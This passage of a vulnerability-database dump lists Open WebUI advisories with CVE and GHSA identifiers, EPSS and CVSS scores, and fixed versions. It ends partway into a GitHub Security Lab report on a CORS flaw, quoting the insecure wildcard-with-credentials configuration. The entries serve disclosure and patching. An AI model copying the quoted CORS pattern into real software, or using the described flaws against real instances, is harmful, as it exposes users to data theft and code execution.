vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.5.17
aliases CVE-2024-8060, GHSA-ff5c-56m7-vc75
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4sn4-mrbm-dfgh
12
url VCID-4v8w-kv6g-kkbc
vulnerability_id VCID-4v8w-kv6g-kkbc
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, multiple endpoints accept a user-supplied file_id and attach the referenced file to a resource the caller controls (folder knowledge, knowledge-base contents) without verifying that the caller owns or has been granted access to the file. The file's content then becomes reachable through the downstream RAG / file-content paths, allowing any authenticated user to exfiltrate any other user's private file — and on the knowledge-base path, also to overwrite it — given knowledge of the file's UUID. This affects backend/open_webui/routers/folders.py (POST /api/v1/folders/{id}/update), backend/open_webui/routers/knowledge.py (add_file_to_knowledge_by_id), and backend/open_webui/routers/knowledge.py (add_files_to_knowledge_by_id_batch). This vulnerability is fixed in 0.9.5.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45402
reference_id
reference_type
scores
0
value 0.00012
scoring_system epss
scoring_elements 0.01734
published_at 2026-06-14T12:55:00Z
1
value 0.00012
scoring_system epss
scoring_elements 0.0172
published_at 2026-06-11T12:55:00Z
2
value 0.00012
scoring_system epss
scoring_elements 0.01726
published_at 2026-06-13T12:55:00Z
3
value 0.00012
scoring_system epss
scoring_elements 0.01723
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45402
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45402
reference_id
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45402
3
reference_url https://github.com/advisories/GHSA-r472-mw7m-967f
reference_id GHSA-r472-mw7m-967f
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-r472-mw7m-967f
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-r472-mw7m-967f
reference_id GHSA-r472-mw7m-967f
reference_type
scores
0
value 8.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-05-15T22:17:20Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-r472-mw7m-967f
fixed_packages
0
url pkg:pypi/open-webui@0.9.5
purl pkg:pypi/open-webui@0.9.5
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5
aliases CVE-2026-45402, GHSA-r472-mw7m-967f
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4v8w-kv6g-kkbc
13
url VCID-4x63-8x64-d3bq
vulnerability_id VCID-4x63-8x64-d3bq
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, a parsing difference between the urlparse and requests libraries led to an SSRF bypass vulnerability. This vulnerability is fixed in 0.9.5.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45400
reference_id
reference_type
scores
0
value 0.00033
scoring_system epss
scoring_elements 0.10286
published_at 2026-06-13T12:55:00Z
1
value 0.00033
scoring_system epss
scoring_elements 0.10269
published_at 2026-06-14T12:55:00Z
2
value 0.00033
scoring_system epss
scoring_elements 0.10234
published_at 2026-06-11T12:55:00Z
3
value 0.00033
scoring_system epss
scoring_elements 0.10283
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45400
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.9.0
reference_id
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.9.0
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45400
reference_id
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45400
4
reference_url https://github.com/advisories/GHSA-8w7q-q5jp-jvgx
reference_id GHSA-8w7q-q5jp-jvgx
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-8w7q-q5jp-jvgx
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-8w7q-q5jp-jvgx
reference_id GHSA-8w7q-q5jp-jvgx
reference_type
scores
0
value 8.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T21:07:46Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-8w7q-q5jp-jvgx
fixed_packages
0
url pkg:pypi/open-webui@0.9.5
purl pkg:pypi/open-webui@0.9.5
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5
aliases CVE-2026-45400, GHSA-8w7q-q5jp-jvgx
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4x63-8x64-d3bq
14
url VCID-5319-t7jm-y3bx
vulnerability_id VCID-5319-t7jm-y3bx
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, FolderForm uses model_config = ConfigDict(extra='allow'), which permits arbitrary fields to pass through Pydantic validation and be included in model_dump(exclude_unset=True). In insert_new_folder, the server-assigned user_id is placed at the start of the dict and then overwritten by the spread of form data. Because FolderModel declares user_id: str as a real field (not just a form extra), any attacker-supplied user_id in the POST body is accepted by the model and persisted on the Folder row. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44550
reference_id
reference_type
scores
0
value 0.00012
scoring_system epss
scoring_elements 0.01843
published_at 2026-06-14T12:55:00Z
1
value 0.00012
scoring_system epss
scoring_elements 0.01831
published_at 2026-06-11T12:55:00Z
2
value 0.00012
scoring_system epss
scoring_elements 0.01834
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44550
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44550
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44550
3
reference_url https://github.com/advisories/GHSA-hr43-rjmr-7wmm
reference_id GHSA-hr43-rjmr-7wmm
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-hr43-rjmr-7wmm
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-hr43-rjmr-7wmm
reference_id GHSA-hr43-rjmr-7wmm
reference_type
scores
0
value 5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N
1
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:N
2
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-15T22:16:08Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-hr43-rjmr-7wmm
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44550, GHSA-hr43-rjmr-7wmm
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-5319-t7jm-y3bx
15
url VCID-5jna-wvd7-j7cm
vulnerability_id VCID-5jna-wvd7-j7cm
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.5, GET /api/v1/retrieval/ returns live RAG pipeline configuration to any unauthenticated HTTP client. No Authorization header, cookie, or API key is required. Every adjacent endpoint on the same router (/embedding, /config) is correctly guarded by get_admin_user making this a targeted omission. This vulnerability is fixed in 0.9.5.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45397
reference_id
reference_type
scores
0
value 0.01075
scoring_system epss
scoring_elements 0.78274
published_at 2026-06-12T12:55:00Z
1
value 0.01075
scoring_system epss
scoring_elements 0.78283
published_at 2026-06-14T12:55:00Z
2
value 0.01075
scoring_system epss
scoring_elements 0.78206
published_at 2026-06-11T12:55:00Z
3
value 0.01075
scoring_system epss
scoring_elements 0.78288
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45397
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45397
reference_id
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45397
3
reference_url https://github.com/advisories/GHSA-65pg-qhhw-mxwg
reference_id GHSA-65pg-qhhw-mxwg
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-65pg-qhhw-mxwg
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-65pg-qhhw-mxwg
reference_id GHSA-65pg-qhhw-mxwg
reference_type
scores
0
value 5.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-18T14:34:06Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-65pg-qhhw-mxwg
fixed_packages
0
url pkg:pypi/open-webui@0.9.5
purl pkg:pypi/open-webui@0.9.5
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.5
aliases CVE-2026-45397, GHSA-65pg-qhhw-mxwg
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-5jna-wvd7-j7cm
16
url VCID-5wfg-zqcy-c7ar
vulnerability_id VCID-5wfg-zqcy-c7ar
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.3, an application-wide Cross-Site Request Forgery (CSRF) vulnerability was found Open-WebUl's image uploading functionality. An attacker can set an image URL to a malicious endpoint, allowing them to perform actions on behalf of a victim user. Any authenticated user can exploit this vulnerability, and any user who views the compromised image (e.g., a profile picture) will unknowingly send a GET request to the attacker-controlled URL. This can lead to cookie theft, denial of service (DoS), or other malicious actions. This vulnerability is fixed in 0.9.3.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45317
reference_id
reference_type
scores
0
value 6e-05
scoring_system epss
scoring_elements 0.00483
published_at 2026-06-14T12:55:00Z
1
value 6e-05
scoring_system epss
scoring_elements 0.00475
published_at 2026-06-13T12:55:00Z
2
value 6e-05
scoring_system epss
scoring_elements 0.00472
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45317
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.9.3
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.9.3
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45317
reference_id
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45317
4
reference_url https://github.com/advisories/GHSA-j6w6-986j-2m2m
reference_id GHSA-j6w6-986j-2m2m
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-j6w6-986j-2m2m
5
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-j6w6-986j-2m2m
reference_id GHSA-j6w6-986j-2m2m
reference_type
scores
0
value 4.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-18T12:47:40Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-j6w6-986j-2m2m
fixed_packages
0
url pkg:pypi/open-webui@0.9.3
purl pkg:pypi/open-webui@0.9.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-cw4k-3s8z-uqh8
6
vulnerability VCID-dzh3-rqx4-fqhv
7
vulnerability VCID-ef1t-pxjm-j7cz
8
vulnerability VCID-hj5f-yk3y-ffdg
9
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.3
aliases CVE-2026-45317, GHSA-j6w6-986j-2m2m
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-5wfg-zqcy-c7ar
17
url VCID-5wzn-mfwg-ybc3
vulnerability_id VCID-5wzn-mfwg-ybc3
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.9.0, the channel router does not call filter_allowed_access_grants on either create or update paths. A non-admin user who can create group channels (or who owns a channel) can submit arbitrary access grants — including public wildcard grants — and those grants are stored verbatim, bypassing the admin's permission framework. This vulnerability is fixed in 0.9.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-44558
reference_id
reference_type
scores
0
value 0.0003
scoring_system epss
scoring_elements 0.09057
published_at 2026-06-14T12:55:00Z
1
value 0.0003
scoring_system epss
scoring_elements 0.09019
published_at 2026-06-11T12:55:00Z
2
value 0.0003
scoring_system epss
scoring_elements 0.09069
published_at 2026-06-13T12:55:00Z
3
value 0.0003
scoring_system epss
scoring_elements 0.09067
published_at 2026-06-12T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-44558
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-44558
reference_id
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-44558
3
reference_url https://github.com/advisories/GHSA-7rjh-px4v-5w55
reference_id GHSA-7rjh-px4v-5w55
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-7rjh-px4v-5w55
4
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-7rjh-px4v-5w55
reference_id GHSA-7rjh-px4v-5w55
reference_type
scores
0
value 5.4
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-19T12:40:24Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-7rjh-px4v-5w55
fixed_packages
0
url pkg:pypi/open-webui@0.9.0
purl pkg:pypi/open-webui@0.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1g27-4vq6-7kdz
1
vulnerability VCID-1tu1-b9de-nfaa
2
vulnerability VCID-4v8w-kv6g-kkbc
3
vulnerability VCID-4x63-8x64-d3bq
4
vulnerability VCID-5jna-wvd7-j7cm
5
vulnerability VCID-5wfg-zqcy-c7ar
6
vulnerability VCID-8nzh-cpda-dkca
7
vulnerability VCID-8y4k-pj2n-8uhm
8
vulnerability VCID-cw4k-3s8z-uqh8
9
vulnerability VCID-dz6g-jgmg-wqce
10
vulnerability VCID-dzh3-rqx4-fqhv
11
vulnerability VCID-ef1t-pxjm-j7cz
12
vulnerability VCID-hj5f-yk3y-ffdg
13
vulnerability VCID-wcz4-vwx4-tufb
14
vulnerability VCID-yug9-shts-kufb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.9.0
aliases CVE-2026-44558, GHSA-7rjh-px4v-5w55
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-5wzn-mfwg-ybc3
18
url VCID-66zh-9jk7-9bfx
vulnerability_id VCID-66zh-9jk7-9bfx
summary Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to 0.8.0, GET /api/v1/memories/ef is accessible without authentication and executes request.app.state.EMBEDDING_FUNCTION(...). This allows any unauthenticated caller to trigger embedding generation which can lead to direct cost exposure if a paid provider is used. This vulnerability is fixed in 0.8.0.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-45667
reference_id
reference_type
scores
0
value 0.00018
scoring_system epss
scoring_elements 0.04836
published_at 2026-06-12T12:55:00Z
1
value 0.00018
scoring_system epss
scoring_elements 0.04811
published_at 2026-06-14T12:55:00Z
2
value 0.00018
scoring_system epss
scoring_elements 0.04832
published_at 2026-06-11T12:55:00Z
3
value 0.00018
scoring_system epss
scoring_elements 0.04822
published_at 2026-06-13T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-45667
1
reference_url https://github.com/open-webui/open-webui
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui
2
reference_url https://github.com/open-webui/open-webui/commit/e5035ea31e179977e805a7032c979ff59a71860a
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/commit/e5035ea31e179977e805a7032c979ff59a71860a
3
reference_url https://github.com/open-webui/open-webui/releases/tag/v0.8.0
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/open-webui/open-webui/releases/tag/v0.8.0
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-45667
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-45667
5
reference_url https://github.com/advisories/GHSA-m69w-p7m4-585j
reference_id GHSA-m69w-p7m4-585j
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-m69w-p7m4-585j
6
reference_url https://github.com/open-webui/open-webui/security/advisories/GHSA-m69w-p7m4-585j
reference_id GHSA-m69w-p7m4-585j
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-18T17:51:44Z/
url https://github.com/open-webui/open-webui/security/advisories/GHSA-m69w-p7m4-585j
fixed_packages
0
url pkg:pypi/open-webui@0.8.0
purl pkg:pypi/open-webui@0.8.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-14xt-qwyg-w3cj
1
vulnerability VCID-1g27-4vq6-7kdz
2
vulnerability VCID-1tu1-b9de-nfaa
3
vulnerability VCID-2xdz-v8cw-fygv
4
vulnerability VCID-32yb-vsfs-43a8
5
vulnerability VCID-3436-znsq-guds
6
vulnerability VCID-4rz6-hw32-jueb
7
vulnerability VCID-4v8w-kv6g-kkbc
8
vulnerability VCID-4x63-8x64-d3bq
9
vulnerability VCID-5319-t7jm-y3bx
10
vulnerability VCID-5jna-wvd7-j7cm
11
vulnerability VCID-5wfg-zqcy-c7ar
12
vulnerability VCID-5wzn-mfwg-ybc3
13
vulnerability VCID-6rbm-rm25-hqgy
14
vulnerability VCID-7nbc-ng1s-suck
15
vulnerability VCID-8n6u-wgz9-1bgj
16
vulnerability VCID-8nzh-cpda-dkca
17
vulnerability VCID-8y4k-pj2n-8uhm
18
vulnerability VCID-chug-ma8r-cucc
19
vulnerability VCID-cw4k-3s8z-uqh8
20
vulnerability VCID-dz6g-jgmg-wqce
21
vulnerability VCID-dzh3-rqx4-fqhv
22
vulnerability VCID-ef1t-pxjm-j7cz
23
vulnerability VCID-hj5f-yk3y-ffdg
24
vulnerability VCID-jfs9-dps1-27a2
25
vulnerability VCID-k9jf-5jzd-pkge
26
vulnerability VCID-n4ma-zcpv-5fbp
27
vulnerability VCID-nxvm-97r4-6ybz
28
vulnerability VCID-pkds-1xgn-q3bv
29
vulnerability VCID-pwsg-72yy-quhk
30
vulnerability VCID-q682-k826-efhv
31
vulnerability VCID-qgfh-7u8n-y7c7
32
vulnerability VCID-qjt1-zxx8-r7ht
33
vulnerability VCID-r7vt-4bqm-f7hb
34
vulnerability VCID-reqw-pfm8-c7g5
35
vulnerability VCID-rhhj-rccv-87hw
36
vulnerability VCID-s625-eg1w-gfd1
37
vulnerability VCID-t571-d65a-cyb2
38
vulnerability VCID-u25g-p4nx-gqd1
39
vulnerability VCID-ujye-g4rj-8be5
40
vulnerability VCID-um53-kf7u-kkg6
41
vulnerability VCID-vghe-uuzj-m7cu
42
vulnerability VCID-vkx3-71kv-sugt
43
vulnerability VCID-w2vd-r3hr-w3bt
44
vulnerability VCID-wb88-83cj-ffhy
45
vulnerability VCID-wcz4-vwx4-tufb
46
vulnerability VCID-yug9-shts-kufb
47
vulnerability VCID-yysb-dk2k-f7g4
48
vulnerability VCID-ze3m-g96u-27fc
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/open-webui@0.8.0
aliases CVE-2026-45667, GHSA-m69w-p7m4-585j
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-66zh-9jk7-9bfx
19
url VCID-68jf-2utx-x7br
vulnerability_id VCID-68jf-2utx-x7br
summary 
Open WebUI has a CORS misconfiguration and session validation issue
# GitHub Security Lab (GHSL) Vulnerability Report, open-webui: `GHSL-2024-174`, `GHSL-2024-175`

The [GitHub Security Lab](https://securitylab.github.com) team has identified potential security vulnerabilities in [open-webui](https://github.com/open-webui/open-webui).

We are committed to working with you to help resolve these issues. In this report you will find everything you need to effectively coordinate a resolution of these issues with the GHSL team.

If at any point you have concerns or questions about this process, please do not hesitate to reach out to us at `securitylab@github.com` (please include `GHSL-2024-174` or `GHSL-2024-175` as a reference). See also [this blog post](https://github.blog/2022-04-22-removing-the-stigma-of-a-cve/) written by GitHub's Advisory Curation team which explains what CVEs and advisories are, why they are important to track vulnerabilities and keep downstream users informed, the CVE assigning process, and how they are used to keep open source software secure.

If you are _NOT_ the correct point of contact for this report, please let us know!

## Summary

Due to a CORS misconfiguration and session validation issue, an attacker may be able to perform a 1 click attack against browsers with admin access to openwebui, resulting in remote code execution in the openwebui instance. The openwebui application runs as root in Docker container's default setup, which allows for complete compromise of the container.

## Project

open-webui

## Tested Version

[v0.3.10](https://github.com/open-webui/open-webui/releases/tag/v0.3.10)

## Details

### Issue 1: CORS misconfiguration on multiple routers (`GHSL-2024-174`)

CORS misconfigurations exist on multiple routers of open-webui which results in allowing arbitrary websites to make authenticated cross site requests to openwebui. Accounts with access to the `/api/v1/functions` endpoint (admins) can execute arbitrary code on the openwebui instance. 

The following pattern occurs at the following routers:
1. [backend/apps/webui/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/webui/main.py#L92)
2. [backend/apps/audio/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/audio/main.py#L58)
3. [backend/apps/images/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/images/main.py#L60)
4. [backend/apps/rag/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/rag/main.py#L246)
5. [backend/apps/openai/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/openai/main.py#L47)
6. [backend/apps/ollama/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/apps/ollama/main.py#L62)
7. [backend/main.py](https://github.com/open-webui/open-webui/blob/v0.3.10/backend/main.py#L881)
```python
app.add_middleware(
    CORSMiddleware,
    allow_origins=["*"],
    allow_credentials=True,
    allow_methods=["*"],
    allow_headers=["*"],
)
```

#### Impact

This issue may lead to `Remote Code Execution`.

#### Remediation

